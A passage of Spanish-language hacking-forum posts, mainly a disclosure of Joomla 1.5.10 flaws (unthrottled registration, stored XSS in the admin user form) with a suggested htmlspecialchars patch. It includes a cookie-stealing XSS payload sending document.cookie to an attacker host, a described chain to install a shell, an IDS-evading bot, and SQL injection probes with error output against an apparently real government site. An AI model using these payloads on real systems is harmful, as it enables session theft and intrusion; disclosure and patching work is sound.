Mensajes

No es posible obtener la coockie de otra web sin bugs.

Así es y desde un include no puedes si lo haces desde tu servidor ya que php se ejecuta en el servidor no en el cliente.
Si hay webs que simulan ser el login de otros sitios pero eso es phishing
http://es.wikipedia.org/wiki/Carding
En ese texto de Wikipedia hay una documentación del carding y mas abajo del phishing.

No se puede a menos que el iframe sea de la misma web que está mostrando el iframe.
Si se puede lograr es atraves de fallas del explorador pero así solo no se puede.

Es como si intentaras poner en un iframe al login de gmail, eso no lo puedes capturar porque el explorador mantiene la privacidad del usuario hacia páginas externas.

actualicé el sistema, la descarga es la misma.

Esto fue debido a que apareció una competencia hecha en phiton


Le hize varios cambios como por ejemplo ahora se puede ver una estadistica en tiempo real sobre la utilización de la memoria para no tener que estar utilizando sistemas externos como imagenes en sistemas webs 

También ahora hace las peticiones mas rápidamente  , aún mas rápido que uno que anda por ahi hecho en phiton xDDD

También le agregué un tiempo fuera al azar entre cada conexión bastante mínima pero lo suficiente para que un IDS no se de cuenta que eres un bot (tal como lo pidió BenRu).

Los detalles están en el primer post.

Dudas, consultas no duden en decirmelas.

Jajaja si pude leer el blog donde estaba el código hecho en phiton pero ahi solo tienen una parte del programa  el mio tiene 4 funciones esenciales, o sea si no funciona uno funciona el otro y así para que no tengan que actualizar el programa cada ves que smf se actualize con algún sistema de protección.
Además de modificar el header tal como lo viste también realiza unas conexiones de paquetes un tanto diferente al común y corriente de un socket.

No lo hize mas rápido porque le puse un sleep de 5 centecimas de segundo por petición y evitar que los administradores de los foros puedan salir molestos por la carga de trabajo.

algún dia lo liveraré pero hoy no 

Lo habia leido en tu blog, pero aqui esta perfecto

eso que está en mi blog es para la versión 1.5.9 que ya se corrigió, esto que yo estoy explicando afecta a la última versión que es la 1.5.10

Reportado:
http://joomlacode.org/gf/project/joomla/tracker/?action=TrackerItemEdit&tracker_item_id=16137

[Creación insegura de usuarios]

bueno, este tema es la continuación de:

Múltiples fallas en Joomla 1.5.9 + PoC [Instalacion de una shell]
https://foro.elhacker.net/nivel_web/multiples_fallas_en_joomla_159_poc_instalacion_de_una_shell-t244742.0.html

Creación insegura de usuarios

Si se han fijado, la sección de creación de usuarios en joomla no contiene ningún sistema de proteción contra la automatización como por ejemplo una captcha o algún sistema audiovisual que por lo menos le haga la vida un poco mas dificil al atacante. Con esto podemos crear usuarios sin la necesidad de pedirle permiso a nadie ni de utilizar el mismo explorador.

Tampoco te limita la cantidad de usuarios creados por ip asi que no puede ser mas fácil crear remotamente un usuario desde un script en perl o cpp.

Una generación de usuarios en masa podría causar la inestabilidad del sistema.

el uso de esta vulnerabilidad puede ser aprobechada por la siguiente:

Vulnerabilidad de tipo XSS en el componente "User" del panel de Administración

Vamos a este enlace:
http://127.0.0.1/joomla/index.php?option=com_user&task=register
Obiamente reemplazando localhost por el servidor a auditar mas la ruta.

En nombre de usuario le podemos insertar código HTML pero hay un pequeño filtro que impide insertar carácteres como "<" pero nada mas, asi que podríamos insertar muy fácilmente una comilla doble para escapar del input y comenzar a insertar el código html.
Ejemplo:
nombre" onclick="document.location='http://www.atacante.com/?cookies.php?cookies='+document.cookie" x="

No pude poner un onload() porque el explorador solamente lo interpreta desde <body> y no desde <input>, de ahi ya viene la imaginación de cada uno.. se ponen un nick super feo y le dicen al admin que si puede cambiarlo por ti y ya con eso cuando le haga click se estará ejecutando el xss con su sesión logueada y el script que recepcionaría la cookie tendría la misma instrucción que el post anterior donde se demostraba la instalación remota de una shell como si fuera módulo:
https://foro.elhacker.net/nivel_web/multiples_fallas_en_joomla_159_poc_instalacion_de_una_shell-t244742.0.html;msg1201898#msg1201898
VIDEO
[youtube=600,500]http://www.youtube.com/watch?v=C-J15H8FT5w&feature=player_embedded[/youtube]

Ahora esta vulnerabilidad también se puede aprovechar con la vulnerabilidad anterior de la creación arbitraria de usuarios haciendo que cuando el atacado vea un sitio web con un iframe de 1 x 1 pixel se redireccione al script en php donde hará la creación del usuario arbitrariamente con el nombre de usuario con código html y posteriormente procederá a la redireccion para su ejecución y posterior instalación de la shell.



esto lo encontré en el archivo:
/administrator/components/com_users/views/user/tmpl/form.php
pero me puse a buscar criterios y pude ver que eran bastantes mas.
Quieren ver a cuantos archivos le afecta esto?:


A 10 archivos en mas de 40 ocasiones incluyendo el theme beez de las abejas.
Esto podría extenderse a todos los themes que se han hechos para joomla y obiamente no pueden repararse todos al 100% asi que la solución mas viable sería devolver los datos ya filtrados en htmlspecialchars aunque eto interrumpiría en algunas funciones personalizadas ya que el valor dejaría de ser fiel al que está en la base de datos.

Hasta ahora no lo he publicando en ningún lado asi que obiamente no está parchado pero pueden hacerlo ustedes mismos y buscar donde diga:
<?php echo $this->user->get('lo_que_sea') ...
lo reemplazan por:
<?php echo htmlspecialchars($this->user->get('lo_que_sea'), ENT_QUOTES) ...

En mi caso aprobeché de optimizar un poco el código agregando cada input a mostrar dentro de un array y no escribir uno por uno como lo hace joomla ahorrando la carga del texto en memoria aunque esto igual sería reemplazado pro el proceso en php pero a la ves se ve mas limpio y modificable:

Código (php) [Seleccionar] Expandir

<form action="index.php" method="post" name="adminForm" autocomplete="off">
<div class="col width-45">
<fieldset class="adminform">
<legend><?php echo JText::_( 'User Details' ); ?></legend>
<table class="admintable" cellspacing="1">
<?php /* Modificaciones */ 
$datos_input[] = array('titulo' => 'Nombre completo',  'id' => 'name');
$datos_input[] = array('titulo' => 'Nick',   'id' => 'username');
$datos_input[] = array('titulo' => 'Apellido paterno',  'id' => 'apellidopaterno');
$datos_input[] = array('titulo' => 'Apellido materno',  'id' => 'apellidomaterno');
$datos_input[] = array('titulo' => 'Correo personal',  'id' => 'email');
$datos_input[] = array('titulo' => 'Correo de empresa',  'id' => 'correodeempresa');
$datos_input[] = array('titulo' => 'Fecha de nacimiento',  'id' => 'fechanacimiento');
$datos_input[] = array('titulo' => 'Fecha de contrato',  'id' => 'fechacontrato');
$datos_input[] = array('titulo' => 'Cargo',  'id' => 'cargo');
$datos_input[] = array('titulo' => 'Estado civil',  'id' => 'estadocivil');
$datos_input[] = array('titulo' => 'Cantidad de cargas',  'id' => 'cantidaddecargas');
$datos_input[] = array('titulo' => 'Tel&eacute;fono empresa',  'id' => 'telefonoempresa');
$datos_input[] = array('titulo' => 'Tel&eacute;fono particular',  'id' => 'telefonoparticular');
$datos_input[] = array('titulo' => 'Domicilio',  'id' => 'domicilio');
$datos_input[] = array('titulo' => 'Comuna',  'id' => 'comuna');
$datos_input[] = array('titulo' => 'Ciudad',  'id' => 'ciudad');

foreach($datos_input as $fila){
echo '
<tr><td class="key">'.htmlspecialchars($fila['titulo'], ENT_QUOTES).'</td>
<td><input size="40" type="text" name="'.htmlspecialchars($fila['id'], ENT_QUOTES).'" value="'.htmlspecialchars($this->user->get($fila['id']), ENT_QUOTES).'" /></td>
</tr>
';
}
?>

antes del input del password.
PD: esto fue una modificación que tube que hacer para un trabajo pero obiamente ustedes también pueden adaptarlo o cuear un mod totalmente nuevo para que la gente se registre.

Bueno, talves no hayan muchos usuarios que se interesen por ese lenguaje ya que si comenzamos a poner mas subforos estariamos llenos  aunque obiamente no es decisión mia.
YST es gay xD

Esa base de datos no está en oracle, eso es un "Access". Había una web con cheats de Sql Inyección con este tipo de gestión pero está parqueado y ya no existe.

Lo máximo que una ves pude lograr desde ese tipo de inyecciones fue un file disclosure ya que podías saber la existencia de archivos y cargarlos pero nada mas.

Además quien va a usar access como base de datos 

/DiputadosXIX/gsocial_showdata.asp?id=1%20union%20select%201%20from%20x.j

Microsoft OLE DB Provider for ODBC Drivers error '80004005'

[Microsoft][ODBC Microsoft Access Driver] Could not find file 'c:\windows\system32\inetsrv\x.mdb'.

/DiputadosXIX/gsocial_showdata.asp, line 54

Vas cambiando la letra x por el archivo que buscas si existe y eso es lo mucho que podría sacar de eso.
También con "order by xx" puedes saber que contiene 11 columnas.
/DiputadosXIX/gsocial_showdata.asp?id=-1 order by 11 -> No hay error
/DiputadosXIX/gsocial_showdata.asp?id=-1 order by 12 -> Error

Sobre eso de Jet:

This article is about JET Red used in Microsoft Access.

Debe ser una especie de sistema que se acopla a la misma base de datos access para tener mayor funcionalidad peor al final la inyección es la misma ya que la base de datos sigue siendo access.
http://en.wikipedia.org/wiki/Microsoft_Jet_Database_Engine

Y $800USD a el-dueño de esta web XD

O mas económico.. $400USD a un moderador global para que convensa al admin.

Si me sirve, gracias.